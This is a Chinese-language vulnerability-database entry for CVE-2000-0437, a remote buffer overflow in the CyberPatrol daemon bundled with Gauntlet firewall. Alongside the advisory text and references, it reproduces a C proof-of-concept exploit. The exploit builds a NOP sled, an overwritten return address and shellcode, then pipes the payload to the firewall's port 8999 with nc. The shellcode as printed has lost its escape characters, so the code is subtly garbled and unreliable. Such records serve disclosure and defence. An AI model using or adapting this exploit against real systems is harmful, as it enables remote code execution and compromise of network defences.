Gauntlet防火墙远程缓冲区溢出漏洞

Gauntlet防火墙远程缓冲区溢出漏洞

漏洞ID 1105842 漏洞类型 缓冲区溢出
发布时间 2000-05-18 更新时间 2005-10-12
图片[1]-Gauntlet防火墙远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0437
图片[2]-Gauntlet防火墙远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200005-073
漏洞平台 IRIX CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19949
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-073
|漏洞详情
gauntlet和WebShield中CyberPatrol守护程序”cyberdaemon”存在缓冲区溢出漏洞。远程攻击者利用此漏洞导致拒绝服务或执行任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/1234/info

A buffer overflow exists in the version of Mattel's Cyber Patrol software integrated in to Network Associates Gauntlet firewall, versions 4.1, 4.2, 5.0 and 5.5. Due to the manner in which Cyber Patrol was integrated, a vulnerability was introduced which could allow a remote attacker to gain root access on the firewall, or execute arbitrary commands on the firewall.

By default, Cyber Patrol is installed on Gauntlet installations, and runs for 30 days. After that period, it is disabled. During this 30 day period, the firewall is susceptible to attack,. Due to the filtering software being externally accessible, users not on the internal network may also be able to exploit the vulnerability.

Some versions of SGI IRIX shipped with the Gauntlet Firewall package, and in the past it was a supported SGI product. While it is no longer being supported, SGI IRIX versions 6.5.2, 6.5.3, 6.5.4 and 6.5.5 may be prone to this issue. 

/*
*                  Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it.  ;) I do not have a Sparc or I would
* write up the Solaris one too.  If you have one, please
* make the changes needed and post it.  Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall.  To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intened for proof of concept only.
*
*
* _Gramble_
*                                             Hey BuBBles
*
*To use:
*      # Animal | nc <address> 8999
*/


#include <stdio.h>


char data[364];

main() {
        int i;
	char shelloutput[80];


/* just borrowed this execute code from another exploit */

	unsigned char shell[] =
        "x90"
	"xebx1fx5ex31xc0x89x46xf5x88x46xfax89x46x0cx89x76"
	"x08x50x8dx5ex08x53x56x56xb0x3bx9axffxffxffxffx07"
	"xffxe8xdcxffxffxff/bin/zzx00";


        for(i=0;i<264;i++)
                data[i]=0x90;
		data[i]=0x30;i++;
		data[i]=0x9b;i++;
		data[i]=0xbf;i++;
		data[i]=0xef;i++;
		data[i] = 0x00;
	for (i=0; i<strlen(shell); i++)
		shelloutput[i] = shell[i];
		shelloutput[i] = 0x00;

	printf("10003.http://%s%s", data, shelloutput);


}
|参考资料

来源:www.tis.com
链接:http://www.tis.com/support/cyberadvisory.html
来源:www.pgp.com
链接:http://www.pgp.com/jump/gauntlet_advisory.asp
来源:BID
名称:1234
链接:http://www.securityfocus.com/bid/1234
来源:OSVDB
名称:322
链接:http://www.osvdb.org/322
来源:BUGTRAQ
名称:20000522GauntletCyberPatrolBufferOverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0249.html

相关推荐: GnoRPM漏洞

GnoRPM漏洞 漏洞ID 1206113 漏洞类型 未知 发布时间 2000-12-19 更新时间 2005-05-02 CVE编号 CVE-2000-0948 CNNVD-ID CNNVD-200012-182 漏洞平台 N/A CVSS评分 7.2 |漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享